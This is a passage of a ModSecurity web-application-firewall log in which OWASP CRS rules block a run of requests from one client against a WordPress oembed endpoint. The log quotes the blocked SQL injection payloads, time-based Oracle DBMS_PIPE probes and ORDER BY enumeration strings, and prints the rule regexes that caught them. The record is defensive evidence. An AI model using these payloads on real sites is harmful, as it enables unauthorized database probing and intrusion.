"OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27GUPAyXqJhbW53WyPZQAAAEU"] [Thu Aug 15 03:23:53.524770 2024] [:error] [pid 31336:tid 139654049679104] [client 141.98.81.52:57176] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml') AND 7052=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(76)||CHR(110)||CHR(114),5) AND ('xCyT'='xCyT"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27GUPAyXqJhbW53WyPZgAAAEI"] [Thu Aug 15 03:23:53.926092 2024] [:error] [pid 31519:tid 139653898278656] [client 141.98.81.52:57178] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml' AND 7052=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(76)||CHR(110)||CHR(114),5) AND 'lxuB'='lxuB"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27GXxeJlWfH1pdny5XiQAAAMw"] [Thu Aug 15 03:23:54.320310 2024] [:error] [pid 31337:tid 139653915064064] [client 141.98.81.52:57180] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml%' AND 7052=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(76)||CHR(110)||CHR(114),5) AND '%'='"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27GuwCyyCVFXh0DMS2owAAAIo"] [Thu Aug 15 03:23:54.654434 2024] [:error] [pid 31337:tid 139654024500992] [client 141.98.81.52:57182] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:format: xml AND 7052=DBMS_PIPE.RECEIVE_MESSAGE(CHR(104)||CHR(76)||CHR(110)||CHR(114),5)-- zNnu"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27GuwCyyCVFXh0DMS2pAAAAIU"] [Thu Aug 15 03:23:55.465212 2024] [:error] [pid 31519:tid 139654032893696] [client 141.98.81.52:57184] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:format: xml) ORDER BY 1-- SIfF"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27G3xeJlWfH1pdny5XigAAAMQ"] [Thu Aug 15 03:23:55.801619 2024] [:error] [pid 31519:tid 139653873100544] [client 141.98.81.52:57186] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27G3xeJlWfH1pdny5XiwAAAM8"] [Thu Aug 15 03:23:56.228994 2024] [:error] [pid 31337:tid 139653923456768] [client 141.98.81.52:57188] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27HOwCyyCVFXh0DMS2pQAAAIk"] [Thu Aug 15 03:23:56.683330 2024] [:error] [pid 31519:tid 139653822744320] [client 141.98.81.52:57190] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27HHxeJlWfH1pdny5XjAAAANU"] [Thu Aug 15 03:23:57.193844 2024] [:error] [pid 31337:tid 139654032893696] [client 141.98.81.52:57192] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27HewCyyCVFXh0DMS2pgAAAIQ"] [Thu Aug 15 03:23:57.572698 2024] [:error] [pid 31337:tid 139654041286400] [client 141.98.81.52:57194] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27HewCyyCVFXh0DMS2pwAAAIM"] [Thu Aug 15 03:23:58.018530 2024] [:error] [pid 31519:tid 139653814351616] [client 141.98.81.52:57196] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27HnxeJlWfH1pdny5XjQAAANY"] [Thu Aug 15 03:23:58.534127 2024] [:error] [pid 31519:tid 139653889885952] [client 141.98.81.52:57198] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27HnxeJlWfH1pdny5XjgAAAM0"] [Thu Aug 15 03:23:58.953633 2024] [:error] [pid 31337:tid 139653864707840] [client 141.98.81.52:57200] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27HuwCyyCVFXh0DMS2qAAAAJA"] [Thu Aug 15 03:23:59.489946 2024] [:error] [pid 31337:tid 139653805958912] [client 141.98.81.52:57202] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27H-wCyyCVFXh0DMS2qQAAAJc"] [Thu Aug 15 03:23:59.923603 2024] [:error] [pid 31337:tid 139653948634880] [client 141.98.81.52:57204] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27H-wCyyCVFXh0DMS2qgAAAIY"] [Thu Aug 15 03:24:00.439166 2024] [:error] [pid 31336:tid 139654058071808] [client 141.98.81.52:57208] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:format: xml ORDER BY 1-- jpcL"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27IEPAyXqJhbW53WyPZwAAAEE"] [Thu Aug 15 03:24:00.951715 2024] [:error] [pid 31519:tid 139654049679104] [client 141.98.81.52:57210] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27IHxeJlWfH1pdny5XjwAAAMI"] [Thu Aug 15 03:24:01.299207 2024] [:error] [pid 31519:tid 139653940242176] [client 141.98.81.52:57212] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27IXxeJlWfH1pdny5XkAAAAMc"] [Thu Aug 15 03:24:01.741279 2024] [:error] [pid 31519:tid 139653906671360] [client 141.98.81.52:57214] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27IXxeJlWfH1pdny5XkQAAAMs"] [Thu Aug 15 03:24:02.218574 2024] [:error] [pid 31519:tid 139654041286400] [client 141.98.81.52:57218] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27InxeJlWfH1pdny5XkwAAAMM"] [Thu Aug 15 03:24:02.643219 2024] [:error] [pid 31519:tid 139653805958912] [client 141.98.81.52:57220] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27InxeJlWfH1pdny5XlAAAANc"] [Thu Aug 15 03:24:03.206825 2024] [:error] [pid 31519:tid 139653847922432] [client 141.98.81.52:57222] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27I3xeJlWfH1pdny5XlQAAANI"] [Thu Aug 15 03:24:03.585803 2024] [:error] [pid 31336:tid 139653881493248] [client 141.98.81.52:57228] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27I0PAyXqJhbW53WyPaAAAAE4"] [Thu Aug 15 03:24:04.152871 2024] [:error] [pid 31336:tid 139653873100544] [client 141.98.81.52:57230] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27JEPAyXqJhbW53WyPaQAAAE8"] [Thu Aug 15 03:24:04.558130 2024] [:error] [pid 31337:tid 139653839529728] [client 141.98.81.52:57232] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27JOwCyyCVFXh0DMS2rAAAAJM"] [Thu Aug 15 03:24:05.135437 2024] [:error] [pid 31519:tid 139654066464512] [client 141.98.81.52:57236] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27JXxeJlWfH1pdny5XlgAAAMA"] [Thu Aug 15 03:24:05.519004 2024] [:error] [pid 31335:tid 139653797566208] [client 141.98.81.52:57238] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:format. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:format: xml') ORDER BY 1-- ypNH"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "Zr27JW0MD5oChETZltkVagAAABg"] [Thu Aug 15 03:24:05.970794 2024] [:error] [pid 31519:tid 139654024500992] [client 141.98.81.52:57240] [client 141.98.81.52] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Cache-Control found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri 